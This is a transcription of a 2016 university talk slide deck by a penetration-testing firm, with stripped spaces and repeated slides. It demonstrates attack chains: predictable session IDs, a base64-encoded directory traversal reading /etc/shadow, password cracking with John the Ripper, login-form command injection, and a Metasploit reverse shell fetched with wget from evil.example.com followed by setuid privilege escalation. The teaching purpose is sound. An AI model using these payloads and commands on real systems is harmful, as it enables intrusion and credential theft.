docPenetration Tester - Click Monkey or Creative Hacker
download 
Report Transcription
Penetration Tester - Click Monkey or Creative Hacker
PenetrationTester
—
ClickMonkeyorCreativeHacker?
SebastianChrobak-RedTeamPentestingGmbH
sebastian.chrobak@redteam-pentesting.de
https://www.redteam-pentesting.de/
SecurityLab2016
ResearchGroupIT-Security-RWTHAachenUniversity
10May2016
Dates&Facts
Foundedin2004atRWTHAachen
11penetrationtesters,
always3inateam
Conductingpenetrationtests
worldwide
ITSecurityResearch
Specialisedexclusivelyonpenetrationtests
→Attackinganetworkorproductwiththeowner’s
consent
Whatisapentest?
WaytotestthesecurityofanITsystem
Conductingacontrolledattack
Offensivetechniquestodiscoverrealvulnerabilities
→Slipintotheroleofarealattacker
Whatisapentest?
WaytotestthesecurityofanITsystem
Conductingacontrolledattack
Offensivetechniquestodiscoverrealvulnerabilities
→Slipintotheroleofarealattacker
Whatisapentest?
WaytotestthesecurityofanITsystem
Conductingacontrolledattack
Offensivetechniquestodiscoverrealvulnerabilities
→Slipintotheroleofarealattacker
Whatcanbetested?
Today,nearlyeverything!
Whatcanbetested?
Today,nearlyeverything!
Webapplications,Apps
(Internal)companynetworks
...andwhatelse?
Homeautomationsystems
Technicaldeviceseveryoneknows/has
What'suptoday?
Howtoapproachobjectivestobetested?
Howtoidentifyvulnerabilities?
Whichtoolscanbeusedtoexploitthem?
Whataretheimpacts?
→Basedonreal-worldexamples!
RandomsessionIDs
RandomsessionIDs
RandomsessionIDsofawebsite
TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL
RandomsessionIDs
RandomsessionIDsofawebsite
TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL
Orjustrandomatfirstglance?
TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL
Howmuchrandomnessisreallyinthere?
Howmuchrandomnessisreallyinthere?
Everysecondcharacterisuppercase
TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL
Howmuchrandomnessisreallyinthere?
Everysecondcharacterisuppercase
TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL
OnlyonecharacterchangedforthreesessionIDs
TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL
Howmuchrandomnessisreallyinthere?
RequestsfromdifferentIPaddresses
Howmuchrandomnessisreallyinthere?
RequestsfromdifferentIPaddresses
From192.168.1.23:
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
Howmuchrandomnessisreallyinthere?
RequestsfromdifferentIPaddresses
From192.168.1.23:
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
From10.100.1.42:
TvWjLdBhGbHvAhJlMgBuPiFkRtJmHOL
Reversingtherandomness
"Secret"key:dahfbhvagjhk
192.168.1.23=192168001023
dahfbhvagjhk
192168001023
-----------ejjghpvahjjn=eJjGhPvAhJjN
Reversingtherandomness
"Secret"key:dahfbhvagjhk
192.168.1.23=192168001023
dahfbhvagjhk
192168001023
-----------ejjghpvahjjn=eJjGhPvAhJjN
TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
Summary
NorandomsessionIDsaregenerated
SessionIDsderivablefromIPaddress
→Accessapplicationonbehalfofotherusers
Summary
NorandomsessionIDsaregenerated
SessionIDsderivablefromIPaddress
→Accessapplicationonbehalfofotherusers
Imageretrievalsystem
Imageretrievalsystem
<imgsrc="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1
hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYm
Y0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Imageretrievalsystem
<imgsrc="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1
hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYm
Y0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Imageretrievalsystem
<imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV
8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW
FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Imageretrievalsystem
<imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV
8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW
FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Imageretrievalsystem
<imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV
8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW
FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
→Imageremainsthesame
Wait,what'sthatURLparameterfor?
<imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV
8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW
FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Wait,what'sthatURLparameterfor?
<imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV
8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW
FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Maybeitisbase64encoded?
Wait,what'sthatURLparameterfor?
<imgsrc="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV
8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OW
FmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"
alt="[...]"width="200"/>
Maybeitisbase64encoded?
$echo-n"bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzY\
xMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0M\
WU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1"|base64-d
Wait,what'sthatURLparameterfor?
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298
fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Wait,what'sthatURLparameterfor?
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298
fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA-256hash,referenceparticularversion
Wait,what'sthatURLparameterfor?
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298
fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA-256hash,referenceparticularversion
Canbereplacedbyadash("-")togetlatestversion
Wait,what'sthatURLparameterfor?
master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298
fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA-256hash,referenceparticularversion
Canbereplacedbyadash("-")togetlatestversion
master|root|12345|image/jpeg|7415687361172.jpg|-
Changingthefilename
$echo-n"master|root|12345|text/plain|\
../../../../../../etc/passwd|-"|base64-w0
bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8u
Li8uLi9ldGMvcGFzc3dkfC0=
Changingthefilename&accessingarbitraryfiles
$curlhttp://www.example.com/medias/redteam?context=bWFzd\
GVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9\
ldGMvcGFzc3dkfC0
Changingthefilename&accessingarbitraryfiles
$curlhttp://www.example.com/medias/redteam?context=bWFzd\
GVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9\
ldGMvcGFzc3dkfC0
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
Whatabout/etc/shadow?
Whatabout/etc/shadow?
$curlhttp://www.example.com/medias/redteam?context=bWFzd\
GVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9\
ldGMvc2hhZG93fC0
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:
[...]
seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1:16929:0:9999
itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.:16929:0:99999
CrackingthepasswordswithJohntheRipper
$catusers
root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/
seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1
itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.
CrackingthepasswordswithJohntheRipper
$johnusers
[...]
Loaded3passwordhasheswith3differentsalts
(sha512crypt,crypt(3)$6$[SHA512128/128AVX2x])
seclab(seclab)
toor(root)
2g0:00:00:020.45%2/3(ETA:08:17:06)0.7905g/s641.5p/s
642.6c/s642.6C/sbigdog..daisy
Trytheharderoneusingapasswordlist
$johnusers--wordlist=top50000.pwd
[...]
Remaining1passwordhash
secret123(itsec)
1g0:00:00:23DONE(2016-05-0808:10)0.04237g/s718.6p/s
718.6c/s718.6C/sswitchfoot..clarinet1
Sessioncompleted
Summary
ContentofURLparametercontextisnotverified
Thefileparameterisvulnerabletodirectorytraversal
→Retrievearbitraryfilesfromtheserver'sfilesystem
Summary
ContentofURLparametercontextisnotverified
Thefileparameterisvulnerabletodirectorytraversal
→Retrievearbitraryfilesfromtheserver'sfilesystem
Webserverisstartedasprivilegeduser(/etc/shadow)
UsingJohntheRippertocracktheusers'passwords
(thepasswordswereweak!)
Summary
ContentofURLparametercontextisnotverified
Thefileparameterisvulnerabletodirectorytraversal
→Retrievearbitraryfilesfromtheserver'sfilesystem
Webserverisstartedasprivilegeduser(/etc/shadow)
UsingJohntheRippertocracktheusers'passwords
(thepasswordswereweak!)
Real-worldexample?
Real-worldexample,really?
Real-worldexample?
ArbitraryfiledisclosureinSAPhybrisCommerceSoftwareSuitemightdisclosee.g.
creditcarddata
Moredetails:
https://www.redteam-pentesting.de/advisories/rt-sa-2014-016
Backendloginform
Administrativebackendloginform
Backendloginform
Administrativebackendloginform
Weakdefaultcredentials
admin:admin
Backendloginform
Administrativebackendloginform
Weakdefaultcredentials
admin:admin
Specialcharacters
;,'"/%(
Backendloginform
Administrativebackendloginform
Weakdefaultcredentials
admin:admin
Specialcharacters
;,'"/%(
→Commandinjection?
Verifycommandinjectionvulnerability
Showfolderlisting
;ls;
Verifycommandinjectionvulnerability
Showfolderlisting
;ls;
Printsysteminformation
;uname-a;
Whathappensinthebackground?
Whathappensinthebackground?
<?php
$login_res=shell_exec(
'bashcheck_password.sh'.$_POST['user'].''.$_POST['pass']
);
?>
Whathappensinthebackground?
<?php
$login_res=shell_exec(
'bashcheck_password.sh'.$_POST['user'].''.$_POST['pass']
);
?>
$login_res=shell_exec(
'bashcheck_password.shadmin;ls;password'
);
Therearesomeconstraints...
Incomingconnectionsonlyacceptedonport80
Port80alreadyblockedbythewebserver
Don'treinventthewheel
Don'treinventthewheel
CreateaconnectbackshellusingMetasploitFramework
$msfvenom-plinux/x86/meterpreter/reverse_tcp\
LHOST=6.6.6.6-felf-ometerpreter
Noplatformwasselected,choosingMsf::Module::Platform::Linuxfromthepayload
NoArchselected,selectingArch:x86fromthepayload
Noencoderorbadcharsspecified,outputtingrawpayload
Payloadsize:71bytes
Savedas:meterpreter
UsingMetasploitFramework
Startingmsfconsoleonattackerhost
$./msfconsole
msf>useexploit/multi/handler
msfexploit(handler)>setpayloadlinux/x86/meterpreter/reverse_tcp
[...]
msfexploit(handler)>exploit
[*]StartedreverseTCPhandleron0.0.0.0:4444
[*]Startingthepayloadhandler...
UsingMetasploitFramework
Usethecommandinjectionvulnerability:
wgethttp://evil.example.com\
/meterpreter
chmod+xmeterpreter
./meterpreter
UsingMetasploitFramework
[*]Transmittingintermediatestagerforover-sizedstage...
[*]Meterpretersession1opened(6.6.6.6:4444->8.8.8.8:58508)
at2016-05-0810:30:53-0400
meterpreter>shell
Process6664created.
Channel1created.
$id
uid=33(www-data)gid=33(www-data)groups=33(www-data)
Howtoexpandprivileges?
Lookforexecutableswithsetuidbit
("setuserIDuponexecution")
→Runexecutablewithpermissionsoffile'sowner
Howtoexpandprivileges?
Lookforexecutableswithsetuidbit
("setuserIDuponexecution")
→Runexecutablewithpermissionsoffile'sowner
$find.-userroot-perm-4000-execls-al{}\;
-rwsr-xr-x1rootroot8008May810:48/usr/local/check_update
Howtoexpandprivileges?
Lookforexecutableswithsetuidbit
("setuserIDuponexecution")
→Runexecutablewithpermissionsoffile'sowner
$find.-userroot-perm-4000-execls-al{}\;
-rwsr-xr-x1rootroot8008May810:48/usr/local/check_update
Sadly,it'snotworld-writable
AnalysingexecutablesusingIDAmulti-processordisassembler
Finally:rootaccess
$PROG=id/usr/local/check_update
Willexecuteid.
uid=1000(seclab)gid=1001(seclab)euid=0(root)groups=1001(seclab)
Summary
User-providedinputisnotescaped
Dangeroussetuidexecutablefound
→Commandexecutionwithrootprivileges
→Fullcompromiseofthesystem
Endangersallconnected(internal)systems
Summary
User-providedinputisnotescaped
Dangeroussetuidexecutablefound
→Commandexecutionwithrootprivileges
→Fullcompromiseofthesystem
Endangersallconnected(internal)systems
Whataretheusualsuspects?
Defaultpasswords
admin:admin,root:root
Broken(management)webapps(WiFirouter,
switches,CIserver)
Outdatedsoftware
(e.g.win2000)
FilesonSMBsharesaccessible:
"passwordlist2016.xlsx"
"passwordforpasswordlist.txt"
Missing/Brokenauthorisation
Certificateverificationfailures
curl_opt_VERIFY_CERT=0
Homebrewtrustmanagers
Moreexamplesonourwebsite
o2/TelefonicaGermany:
ACSDisclosesVoIP/SIPCredentials
AVMFRITZ!Box:
RemoteCodeExecutionviaBufferOverflow
UnauthenticatedRemoteCodeExecutioninIBMEndpointManagerMobileDevice
ManagementComponents
EntryPassN5200CredentialsDisclosure
https://www.redteam-pentesting.de/advisories/
Whatdoesapentester'sdaylooklike?
Whatdoesapentester'sdaylooklike?
Regularusageofthesoftware:
Understandtheapplication'sfunctionalityandbehaviour
→Basisforanyfurtherexploitation
Provokeerrors,watchforanomalies
Whatdoesapentester'sdaylooklike?
Regularusageofthesoftware:
Understandtheapplication'sfunctionalityandbehaviour
→Basisforanyfurtherexploitation
Provokeerrors,watchforanomalies
Uncoverwhat'shappeninginthebackground:
Analysethecommunication,understandhowservicesplaytogether
Whatdoesapentester'sdaylooklike?
Identifyweaknessesandexploitvulnerabilities
Manipulateparameters
Insertunexpectedvalues
Changeperspectives
Becreative,usefunctionsdifferently!
Whatdoesapentester'sdaylooklike?
Identifyweaknessesandexploitvulnerabilities
Manipulateparameters
Insertunexpectedvalues
Changeperspectives
Becreative,usefunctionsdifferently!
Documentation
About30%ofthetimeofapentest
Whatdoesapentester'sdaylooklike?
Identifyweaknessesandexploitvulnerabilities
Manipulateparameters
Insertunexpectedvalues
Changeperspectives
Becreative,usefunctionsdifferently!
Documentation
About30%ofthetimeofapentest
FinalMeeting
Discussionofvulnerabilities
Livedemo
Butwait,aren'ttheretoolstodothis?
Butwait,aren'ttheretoolstodothis?
Toolscannotfindnon-obviousvulnerabilities
Especiallynottheinterestingones!
Pentestingishandwork!
Buttoolseasetheexploitation
Knowyourtoolboxandpicktherightone!
Thisistheend.
Thankyouforlistening!
Anyquestions?
Thisistheend.
Thankyouforlistening!
Anyquestions?
Next:Opendiscussionround!
